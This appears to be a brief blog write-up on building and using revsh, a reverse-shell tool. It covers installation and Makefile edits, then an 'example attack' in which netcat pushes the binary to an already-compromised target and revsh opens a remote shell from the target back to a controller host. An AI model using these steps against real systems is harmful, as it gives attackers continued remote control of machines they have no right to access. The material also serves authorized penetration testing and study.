New Awesome Tool [REVSH]

Took a couple hours to figure out this tool and wrote a little write-up on the issues I found, how I solved them, and an example engagement. Props to @emptymonkey on twitter for the tool! https://github.com/emptymonkey/revsh.git

 

Installation


sudo apt-get install openssl libssl-dev # Pre-req for building.
git clone https://github.com/emptymonkey/revsh.git
cd revsh
nano config.h # (OPTIONAL) Set up new defaults that fit your situation.
Editing the Makefile
nano Makefile #EDIT THE MAKEFILE SO IT LOOKS LIKE THIS
————————————-
## Linux
CFLAGS = -Wall -Wextra -std=c99 -pedantic -Os -DOPENSSL
LIBS = -lssl -lcrypto
KEYS_DIR = keys
KEY_OF_C = in_the_key_of_c
IO_DEP = io_ssl.c
## Linux w/static libraries.
#CFLAGS = -static -Wall -Wextra -std=c99 -pedantic -Os -DOPENSSL
#LIBS = -lssl -lcrypto -ldl -lz
#KEYS_DIR = keys
#KEY_OF_C = in_the_key_of_c
#IO_DEP = io_ssl.c
————————————-
Finishing Up
mkdir /usr/local/share/man/man1 2&>/dev/null # Weird problem I ran into
make # This *can* take a very long time, though it usually doesn’t.
make install
cd ~/.revsh
nano rc # (OPTIONAL) Add your favorite startup commands to really customize the feel of your remote shell.
revsh -h # READY TO GO
Example Attack

Now to attack!
Once you get a shell, send the revsh binary with these commands:
Target:
nc -lvp <port> > revsh
Controller:
nc -w 3 <ip> <port> < revsh
Once Uploaded run these commands:
Controller:
revsh -c -vvv <ip>:<port>
Target:
chmod +x revsh
revsh <ip>:<port>
 
Troubleshooting

If you get a fingerprint mismatch, that means you did not use the same compiled binary for both sides, therefore, you need to run with the ‘-a’ flag.

 

Leave a Reply

Your email address will not be published. Required fields are marked *